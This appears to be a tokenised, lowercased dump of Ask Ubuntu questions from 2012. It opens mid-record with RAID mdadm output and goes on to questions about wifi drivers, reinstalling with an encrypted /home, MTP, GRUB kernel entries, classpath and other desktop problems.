fd linux raid autodetect /dev/sdf2 19535040 21494969 979965 fd linux raid autodetect /dev/sdf3 21494970 1953520064 966012547+ 5 extended /dev/sdf5 21495033 987499484 483002226 fd linux raid autodetect /dev/sdf6 987499548 1953520064 483010258+ fd linux raid autodetect /dev/sda is an auxilary disk , which is not used for anything in particular . sudo mdadm -- examine /dev/sdb5 /dev/sdb5 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : 2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name : pieciodysk:6 creation time : sun sep 12 19:36:21 2010 raid level : -unknown- raid devices : 0 avail dev size : 966004180 ( 460.63 gib 494.59 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : 64b1c028:14da81bd:06bfb40b : c30ff7d6 update time : tue sep 11 17:05:27 2012 checksum : e4b0a0dd - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdc5 /dev/sdc5 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : 2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name : pieciodysk:6 creation time : sun sep 12 19:36:21 2010 raid level : -unknown- raid devices : 0 avail dev size : 966004180 ( 460.63 gib 494.59 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : 6b8374d4:4a4f71a1:23f7fa5c:7a7953c1 update time : tue sep 11 17:05:27 2012 checksum : aff689f7 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdd5 /dev/sdd5 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : 2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name : pieciodysk:6 creation time : sun sep 12 19:36:21 2010 raid level : -unknown- raid devices : 0 avail dev size : 966004180 ( 460.63 gib 494.59 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : 017925d6:8db5b2ca:8795d93e : c0205358 update time : tue sep 11 17:05:27 2012 checksum : 53c72b78 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sde5 /dev/sde5 : magic : a92b4efc version : 1.2 feature map : 0x1 array uuid : 2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name : pieciodysk:6 creation time : sun sep 12 19:36:21 2010 raid level : raid6 raid devices : 5 avail dev size : 966004180 ( 460.63 gib 494.59 gb ) array size : 2898012288 ( 1381.88 gib 1483.78 gb ) used dev size : 966004096 ( 460.63 gib 494.59 gb ) data offset : 272 sectors super offset : 8 sectors state : clean device uuid : a9a93188:1c1ae289 : b56398c7:6be226cb internal bitmap : 2 sectors from superblock update time : mon sep 10 08:31:33 2012 checksum : c0a8031a - correct events : 80390 layout : left-symmetric chunk size : 64k device role : active device 3 array state : aaaaa ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdf5 /dev/sdf5 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : 2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name : pieciodysk:6 creation time : sun sep 12 19:36:21 2010 raid level : -unknown- raid devices : 0 avail dev size : 966004180 ( 460.63 gib 494.59 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : d7b87b43:298cdd3d:3f900370:198f3f48 update time : tue sep 11 17:05:27 2012 checksum : 555eaafb - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdb6 /dev/sdb6 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : a3945c40:73237cd6:3d61998e:8f773d03 name : pieciodysk:5 creation time : sun sep 12 19:36:39 2010 raid level : -unknown- raid devices : 0 avail dev size : 966020245 ( 460.63 gib 494.60 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : a61e9d6f:35b53cb1:96105de8:60991128 update time : tue sep 11 17:05:26 2012 checksum : 8aa72e70 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdc6 /dev/sdc6 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : a3945c40:73237cd6:3d61998e:8f773d03 name : pieciodysk:5 creation time : sun sep 12 19:36:39 2010 raid level : -unknown- raid devices : 0 avail dev size : 966020245 ( 460.63 gib 494.60 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : 2006abf7:13538568 : e5cf2d58:2961a894 update time : tue sep 11 17:05:26 2012 checksum : a6653ae8 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdd6 /dev/sdd6 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : a3945c40:73237cd6:3d61998e:8f773d03 name : pieciodysk:5 creation time : sun sep 12 19:36:39 2010 raid level : -unknown- raid devices : 0 avail dev size : 966020245 ( 460.63 gib 494.60 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : 1cf3988f:5259d109:9a8cd419 : db31b135 update time : tue sep 11 17:05:26 2012 checksum : 424ebb86 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sde6 /dev/sde6 : magic : a92b4efc version : 1.2 feature map : 0x1 array uuid : a3945c40:73237cd6:3d61998e:8f773d03 name : pieciodysk:5 creation time : sun sep 12 19:36:39 2010 raid level : raid5 raid devices : 5 avail dev size : 966020245 ( 460.63 gib 494.60 gb ) array size : 3864080896 ( 1842.54 gib 1978.41 gb ) used dev size : 966020224 ( 460.63 gib 494.60 gb ) data offset : 272 sectors super offset : 8 sectors state : clean device uuid : a496841f:489b48dc : e330989a:5991ff4f internal bitmap : 2 sectors from superblock update time : mon sep 10 08:31:33 2012 checksum : 3fd62187 - correct events : 66542 layout : left-symmetric chunk size : 64k device role : active device 3 array state : aaaaa ( 'a ' == active , ' . ' == missing ) sudo mdadm -- examine /dev/sdf6 /dev/sdf6 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : a3945c40:73237cd6:3d61998e:8f773d03 name : pieciodysk:5 creation time : sun sep 12 19:36:39 2010 raid level : -unknown- raid devices : 0 avail dev size : 966020245 ( 460.63 gib 494.60 gb ) data offset : 272 sectors super offset : 8 sectors state : active device uuid : 36e0774e:6d6fbde9 : d979fbe2:9d91b3ba update time : tue sep 11 17:05:26 2012 checksum : 2f430bc0 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing )
186667	intel ultimate-n 6300 super unreliable	i 've tried everything to get this card working , including the 11n_disable , bt_coex_active , and swcrypto modprobe options . i 've decided that it is just the drivers that are shipped with the default 12.04 kernel . is there anything i should be concerned about in updating the kernel ? relevant information : uname -r 3.2.0-30-generic > dmesg | grep iwl [ 4505.650327 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 4505.657069 ] iwlwifi 0000:03:00.0 : radio type=0x0-0x3-0x1 [ 8992.468190 ] iwlwifi 0000:03:00.0 : pci int a disabled [ 9256.148984 ] iwlwifi 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 9256.149051 ] iwlwifi 0000:03:00.0 : setting latency timer to 64 [ 9256.149092 ] iwlwifi 0000:03:00.0 : pci_resource_len = 0x00002000 [ 9256.149093 ] iwlwifi 0000:03:00.0 : pci_resource_base = ffffc900050b4000 [ 9256.149095 ] iwlwifi 0000:03:00.0 : hw revision id = 0x3e [ 9256.149394 ] iwlwifi 0000:03:00.0 : irq 44 for msi/msi-x [ 9256.149503 ] iwlwifi 0000:03:00.0 : detected intel ( r ) centrino ( r ) ultimate-n 6300 agn , rev=0x74 [ 9256.149689 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 9256.167372 ] iwlwifi 0000:03:00.0 : device eeprom ver=0x43a , calib=0x6 [ 9256.167374 ] iwlwifi 0000:03:00.0 : device sku : 0x1f0 [ 9256.167375 ] iwlwifi 0000:03:00.0 : valid tx ant : 0x7 , valid rx ant : 0x7 [ 9256.167390 ] iwlwifi 0000:03:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 9256.174596 ] iwlwifi 0000:03:00.0 : loaded firmware version 9.221.4.1 build 25532 [ 9256.175654 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 9398.048710 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 9398.055484 ] iwlwifi 0000:03:00.0 : radio type=0x0-0x3-0x1 [ 9398.302922 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 9398.309655 ] iwlwifi 0000:03:00.0 : radio type=0x0-0x3-0x1 > lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 02:00.0 system peripheral : ricoh co ltd device e823 ( rev 07 ) 03:00.0 network controller : intel corporation centrino ultimate-n 6300 ( rev 3e ) > iwconfig wlan0 ieee 802.11abgn essid : '' school.edu '' mode : managed frequency:5.765 ghz access point : d8 : c7 : c8 : a1 : c8 : e8 bit rate=81 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=54/70 signal level=-56 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 my laptop is a lenovo x230 .
186670	reinstalling 12.04 and preserving encrypted /home . possible ?	my /home directory is about 200 gb and encrypted . i need to reinstall ubuntu 12.04 ( fresh install ) to fix some problems and and concerned that i might lose access or have to format /home during the installation . is it easy and possible to reinstall without losing /home ? what should i keep in mind in order to preserve the directory and be able to decrypt it after re-installation ?
186674	command like inotify - or another solution ?	is it possible to recursively scan changed files from more than 3 weeks ago with inotify , or is inotify only for starting cron jobs ? what other command can i try for checking for changed files that are more than 3 weeks old ?
186675	can not proceed on ubuntu upgrade from 10.04 to 12.04	i am trying to upgrade 10.04 to 12.04 my system is linux patmos 2.6.32-42-generic # 96-ubuntu smp wed aug 15 19:37:37 utc 2012 x86_64 gnu/linux however , i get the following error during the upgrade . anyone could help ? thanks ! checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes the software on this computer is up to date . there are no upgrades available for your system . the upgrade will now be canceled . do you want to start the upgrade ?
186680	what is the best configuration while installing the fresh ubuntu	i 'm going to install fresh ubuntu on my laptop . but i some time ago i read somewhere that it is better to place ur home directory in other partition . if its better then what are the advantages it has over installing home directory in the same partition of system or should i say root . i will create two partitions for ubuntu . one default for root and other partition for other user . and will i be able to install applications on second partition where the regular user account is available ? ? ? . please correct if i 'm wrong .
186681	getting mtp to work with a galaxy tab 2 7.0 ?	i 'm trying to get mtp with the galaxy tab 2 7.0 working on my ubuntu installation . such that i can access the files . i tried to do what is described here : http : //www.omgubuntu.co.uk/2011/12/how-to-connect-your-android-ice-cream-sandwich-phone-to-ubuntu-for-file-access i however fail at executing one of the following commands mtp-detect | grep idvendor mtp-detect | grep idproduct this fails [ 20:42|0 ] $ mtp-detect | grep idvender device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note . ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt unable to open raw device 0 [ 20:44|0 ] $ mtp-detect | grep idproduct device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note . ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt unable to open raw device 0 now my guess was was that the idvender is the same as the vid ( 04e8 ) and the idproduct is the same as pid ( 6860 ) now i continued to work with those values and completed the tutorial . when finished i tried android-connect this returned fuse : bad mount point `/media/galaxytab ' : transport endpoint is not connected does anybody have a clue what to do ? also i want to note that when i connect my galaxytab 2 7.0 that i still get a pop-up of ubuntu that a device was connected . i also can still see the mapstructure , the problem however is is that all the folders have 0 bytes and do not have any subfolders . i can only see the folders in the root . ps . i also checked a similar question and tried what is described in this answer http : //askubuntu.com/a/88630/27480 -- 2012-09-18 -- edit -- using go-mtpfs , described in the first answer , http : //linuxundich.de/de/android/mit-go-mtpfs-unter-linux-auf-android-handys-via-mtp-zugreifen/ , i got the following for my samsung galaxy sii [ 23:21|0 ] $ go-mtpfs android 2012/09/18 23:21:58 compiled against libmtp 1.1.3 device 0 ( vid=04e8 and pid=6865 ) is unknown . please report this vid/pid and the device model to the libmtp development team 2012/09/18 23:21:58 device unknown : unknown ( 04e8:6865 ) @ bus 1 , dev 7 : ignoring usb_claim_interface = -6ignoring usb_claim_interface = -5ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt 2012/09/18 23:22:18 rdev.open : open : open returned nil for the samsung galaxy tab 2 7.0 it didnt work either ... [ 23:31|0 ] $ go-mtpfs android 2012/09/18 23:31:03 compiled against libmtp 1.1.3 device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note . 2012/09/18 23:31:03 device samsung : gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note ( 04e8:6860 ) @ bus 1 , dev 11 : ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt 2012/09/18 23:33:04 rdev.open : open : open returned nil jmtpfs did n't work either : - ( [ 23:42|0 ] $ jmtpfs ~/android/ device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note . ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt terminate called after throwing an instance of 'mtperrorcantopendevice' what ( ) : ca n't open device aborted ( core dumped )
186682	music store - is it safe to edit tags of music purchased on ubuntu one ?	is it safe to tamper with tags of files in ~/.ubuntuone/purchased from ubuntu one , if the folder is synced locally ?
186685	strange behaviour of launcher icon positions	it 's a hardly any trouble but i still want to ask in case anyone knows . i like to keep my launcher clean with just two or three most common applications pinned . the strange behaviour is that new applications that are not pinned in the launcher always open up at the position just above bottom pinned one . a picture is worth a thousand words : an example with 2 applications pinned an example with 3 applications pinned ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -- -- -- + + -- -- -- + + -- -- -- + + -- -- -- + | dash | | dash | | dash | | dash | +======+ +======+ +======+ +======+ | 1 | launch | 1 | | 1 | launch | 1 | + -- -- -- + ========== > + -- -- -- + + -- -- -- + ========== > + -- -- -- + | 2 | 'new ' app | new | | 2 | 'new ' app | 2 | + -- -- -- + + -- -- -- + + -- -- -- + + -- -- -- + | s | | 2 | | 3 | | new | + -- -- -- + + -- -- -- + + -- -- -- + + -- -- -- + | s | | s | | 3 | + -- -- -- + + -- -- -- + + -- -- -- + | s | + -- -- -- + i can always manually position icons after launch but it would be better if pinned applications have a fixed position without an intervention in order to intuitively use shortcuts for < super > 1-9 ( i.e . i could always tell that my firefox can be reached with < super > 2 since i pinned it there ) . is there a tweak for this or maybe should it count as a bug ?
186689	issue with libgl.so	i am new ubuntu , i have just installed ubuntu 12.04 on hp probook 4530 for my android development , i have installed oracle jdk 6 , android sdk and ndk but whenever i start android emulator i got this error failed to load libgl.so error libgl.so : can not open shared object file : no such file or directory i have found a similar post on stackoverflow http : //stackoverflow.com/questions/11332817/failed-to-load-libgl-so-in-android but it does not seems helpful to me , can someone help me to figure out this problem considering i am new to ubuntu regards ahsan
186691	is it possible to backup installed software installers ?	is it possible to download the installed software installers , and/or the software sources list ? i 'd like to make sure i have all that if some unfortunate event happened , and all i 'd have to do is run them . thanks . i 'm still learning more and more about ubuntu and it 's really cool ! : )
186692	ati propriatery drivers install latest 12.8 , broke my kernel . stuck on kernel 3.2.0-26	i messed up a bit . hoping some here can help me . i tried to install the newest catalyst 12.8 . sadly , this broke my system . i was stuck in low graphics mode . i finally managed to restore the proprietary drivers , and get into ubuntu again . but now i am stuck on kernel 3.2.0.26 . i had installed kernel 3.2.0-30 , but the system no longer sees it . i have kernel 3.2.0-29 too , but the system can not see that as well . in the grub menu . when i use sudo update-grub , they are both listed . here are the output i get : searching for grub installation directory ... found : /boot/grub can not determine root device . assuming /dev/hda1 this error is probably caused by an invalid /etc/fstab searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.2.0-30-generic found kernel : /boot/vmlinuz-3.2.0-29-generic found kernel : /boot/vmlinuz-3.2.0-27-generic found kernel : /boot/vmlinuz-3.2.0-26-generic found grub 2 : /boot/grub/core.img found kernel : /boot/memtest86+.bin updating /boot/grub/menu.lst ... done i have searched everywhere to find a solution to my problem , but ca n't find any solutions . if you need any log outputs to figure out the problem , please let me know which ones . update : here is the output for grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b set locale_dir= ( $ root ) /boot/grub/locale set lang=nb_no insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , med linux 3.2.0-26-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b linux /boot/vmlinuz-3.2.0-26-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-26-generic } menuentry 'ubuntu , med linux 3.2.0-26-generic ( gjenopprettelsesmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b echo 'laster linux 3.2.0-26-generic ... ' linux /boot/vmlinuz-3.2.0-26-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-26-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , med linux 3.2.0-25-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b linux /boot/vmlinuz-3.2.0-25-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-25-generic } menuentry 'ubuntu , med linux 3.2.0-25-generic ( gjenopprettelsesmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b echo 'laster linux 3.2.0-25-generic ... ' linux /boot/vmlinuz-3.2.0-25-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-25-generic } menuentry 'ubuntu , med linux 3.2.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b linux /boot/vmlinuz-3.2.0-24-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-24-generic } menuentry 'ubuntu , med linux 3.2.0-24-generic ( gjenopprettelsesmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b echo 'laster linux 3.2.0-24-generic ... ' linux /boot/vmlinuz-3.2.0-24-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-24-generic } menuentry 'ubuntu , med linux 3.2.0-23-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b linux /boot/vmlinuz-3.2.0-23-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic } menuentry 'ubuntu , med linux 3.2.0-23-generic ( gjenopprettelsesmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b echo 'laster linux 3.2.0-23-generic ... ' linux /boot/vmlinuz-3.2.0-23-generic root=uuid=270c7c58-06d8-4e6b-b9bb-8d92f46adc0b ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 270c7c58-06d8-4e6b-b9bb-8d92f46adc0b linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sdb1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 448af3ce8af3ba8e chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # how can i set kernel 3.2.0.30 as the default kernel ? according to this file , kernel 3.2.0-30 does not exist .
186693	how set classpath variable for a folder in ubuntu	i know that export classpath=/usr/local/java/tools.jar : $ classpath will add tools.jar to the classpath , but i want to set folder to the classpath like this export classpath=/usr/local/java/lib/ : $ classpath but its not working .
186695	i accidentaly removed ubuntu software centre	it seems that i accidentaly un-installed ubuntu software centre.i relly want to re-install it but i don`t know how.can someone help me ?
186696	login wallpaper	i know the desktop background wallpaper will also be displayed on the login screen . what would i need to set the login wallpaper separate from the desktop wallpaper ? thanks
186698	skydrive - blank page	i 'm running 12.04 . when i try to access skydrive i get a completely blank page . this happens with firefox , opera , chrome & chromium browsers . the behavior began just yesterday ; until then i had no problem . yesterday , during an upload in chromium , i was working in firefox and my screen went black and was forced to shut down via the power button . on reboot and login , nothing worked - no desktop icons or launcher or right click function . rebooting and using the guest account everything seemed to work ( no skydrive , though ) except i had huge icons in the launcher and was unable to resize them ( no icon resize bar any place it was supposed to be ) . eventually found out i was able to use my own account if i switched from ubuntu to ubuntu 2d during log in but still had huge icons and no resize slidebar . today , i upgraded and was able to go back to using my account normally , to resize the icon , but still no skydrive . any ideas ? i visited the ms website and others running windows are also having the problem , which would seem to indicate it might be more of a skydrive login problem , except that i was able to use skydrive with all of my browsers with no problem until the `` incident '' yesterday . now it does n't work with any of them . i need to be able access those files . help , please .
186700	how to recover from deleting menubar ?	i am working with ubuntu quickly , and i ran the quickly design command , then deleted the menubar . but when i run , i get this error : attributeerror : uifactory instance has no attribute 'helpmenu' i tried commenting out sections , but a simple search of the source code does n't show helpmenu . and google search for `` quickly '' gives you a lot of false positives ...
186702	xbox burner to backup my xbox360 games isnt recognizing game in dvd drive right ? ubuntu 12.04	i was trying to use xbox burner to backup make backup copies of my sons xbox games in case he scratched one up . when i put the game in all i see is an audio file and video file in the media folder . xbox burner is n't recognizing an iso file to use from the game at all . also when i put the game in vlc opens it but has errors on the audio and video files but shows the xbox splash screen . does anyone know how to make xbox burner work correctly ? or give me step by step instructions on what i need to set this up correctly ?
186704	unable to install ubuntu 12.04.1 on virtualbox on windows 7 host	i would like to install ubuntu 12.04.1 in a virtual box on windows 7 host however i get a black screen after selecting to install ubuntu i.e . right after choosing english language i have tried the 32bit and 64bit version desktop version , have also read thru some guides e.g . http : //www.psychocats.net/ubuntu/virtualbox but i could not find any solution to fix this problem . btw i have ubuntu installed using virtual pc ( not running at the same time ) , also i have mac os ( mountain lion ) installed using virtual box so i do not think it is a problem with the virtual box or windows 7 host . my vm configuration is with 1 core and 1 gb of ram using 20gb vdi ; rest is default config . my hardware is core i7 3770k / asus p8z77-v deluxe / gskill 32gb which i believe should be more than sufficient to run another vm . i have moved my user profile from ssd to hdd via junction however imho it should not matter . has anyone else come across this problem and found a solution ? any help/thoughts on how to solve this would be very much appreciated .
186706	lenovo g580 brightness error caused by unsupported updates . how to revert ?	i just installed the 64-bit version of ubuntu 12.04 on my newly bought lenovo g580 . the brightness control was working properly using the live cd and when i first started the installed version . then i updated ubuntu and restarted my laptop , and suddenly now , i ca n't change the brightness . i think its caused by some update . and then i went and checked my update settings , and saw that unsupported updates ( precise-backports ) were enabled by default . so now i need to fix this brightness issue somehow . what should i do to locate the wrong update and remove it ? i do n't even mind removing all the updates right now . thanks for the help . : )
186709	censorship of nudity in ubuntu one	certain cloud storage facilities have declared an absolute ban on the storage of images portraying nudity . this has implications for those involved in many fields , including naturism - a lawful pastime practised throughout europe and the americas . does ubuntu one have any specific policy restricting the storage of images portraying nudity ?
